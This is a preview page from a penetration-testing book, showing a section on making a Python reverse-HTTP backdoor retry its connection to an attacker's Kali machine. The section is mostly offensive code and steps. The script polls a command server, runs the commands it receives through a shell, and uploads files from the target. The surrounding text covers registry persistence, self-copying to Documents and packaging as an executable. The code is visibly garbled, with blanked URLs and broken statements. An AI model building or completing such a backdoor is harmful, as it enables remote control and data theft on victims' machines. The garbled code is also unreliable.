Book Image

Python for Offensive PenTest

By : Hussam Khrais
Book Image

Python for Offensive PenTest

By: Hussam Khrais

Overview of this book

Python is an easy-to-learn and cross-platform programming language that has unlimited third-party libraries. Plenty of open source hacking tools are written in Python, which can be easily integrated within your script. This book is packed with step-by-step instructions and working examples to make you a skilled penetration tester. It is divided into clear bite-sized chunks, so you can learn at your own pace and focus on the areas of most interest to you. This book will teach you how to code a reverse shell and build an anonymous shell. You will also learn how to hack passwords and perform a privilege escalation on Windows with practical examples. You will set up your own virtual hacking environment in VirtualBox, which will help you run multiple operating systems for your testing environment. By the end of this book, you will have learned how to code your own scripts and mastered ethical hacking from scratch.
Table of Contents (13 chapters)
Title Page
Copyright and Credits
Packt Upsell

Tuning the connection attempts

In all our previous sections, we have assumed that the attacker and the target machine are in sync with time. This means that our server was up and listening all the time. Now, the question is: What happens if the attacker machine was offline for some reason or the connection did not happen properly? Well, our backdoor on the client side will crash and at the same time give a pop up as an error message and dump a text file indicating an exception error.

Currently, our Kali machine is not listening on any port. So, if the attacker initiates a TCP SYN to make a connection with us, now, since the port is closed, our Kali machine will reply with a TCP RST. Now, let's have a quick look at the packet level: 

  1. Enable Wireshark on the attacker machine by executing sudo wireshark and you can see that our script is not running there
  2. Start a new live capture
  3. Set the filter to TCP
  4. Log in on the Windows machine
  5. Since we are not listening to port 80, we are replying  with TCP RST, as you can see in the following screenshot:

Also, on the target side, our script will crash and throws away an exception or log message. Navigate to the log file and you'll see that it says connection aborted because the target machine actively refused it, as shown in the following screenshot:

Log in with the admin account, where we have the Python compiler. So we'll fix this issue by creating an infinite loop with an exception handler, as shown here:

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved 
# Follow me on LinkedIn

# Tunning

import os
import shutil
import subprocess
import _winreg as wreg

import requests 
import time


#Last phase is to start a reverse connection back to our kali machine
import random
def connect():
    while True: 

        req = requests.get('')
        command = req.text

        if 'terminate' in command:
            return 1 

        elif 'grab' in command:

            if os.path.exists(path):
                url = ''
                files = {'file': open(path, 'rb')}
                r =, files=files)
                post_response ='', data=
                                          '[-] Not able to find the file !' )

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            post_response ='', )
            post_response ='', )

while True:
        if connect()==1:
        sleep_for = random.randrange(1,10)
        time.sleep( sleep_for )
        #time.sleep( sleep_for ) #sleep for a random time between 1-10 minutes

As you can see, a new function called connect() is added to the script. So, using an exception handler, whatever the reason may be, if we get an exception for initiating the connection, we'll sleep for some random time between 1 to 10 seconds, and then try to connect again. In a real-world scenario, you've got to be more patient and make it from 1 to 10 minutes. In the end, we pass the exception instead of raising it here. Now, the question is: How to terminate the process, as we have two infinite loops? Since the single break command won't do the job for us, the trick here is, if we terminate, then we will break the whole function and retain a value of 1. And if the connection function retains the value of 1, then we will break the second loop, which will terminate the process eventually.

Now, let's quickly try and test this modification:

  1. As we've done earlier, export the script to EXE
  2. Ensure that the Documents folder and the registry key are empty
  3. Double-click on Persistence.exe from the dist folder and run the script

And once we run our script here, notice that the target keeps trying to reach us until we run our server and the connection attempts here will be anywhere between 1 to 10 seconds, as shown in the following screenshot:

Now, once we start our listener on the server side, we have completed three-way handshakes and got the GET request from our target, as shown in the following screenshot:

Check whether the registry key is there and whether the script has copied itself to Documents. So, the last thing to test is whether the termination process is working or not. Ping and perform a terminate. You can see that Persistence.exe is gone from the Windows Task Manager.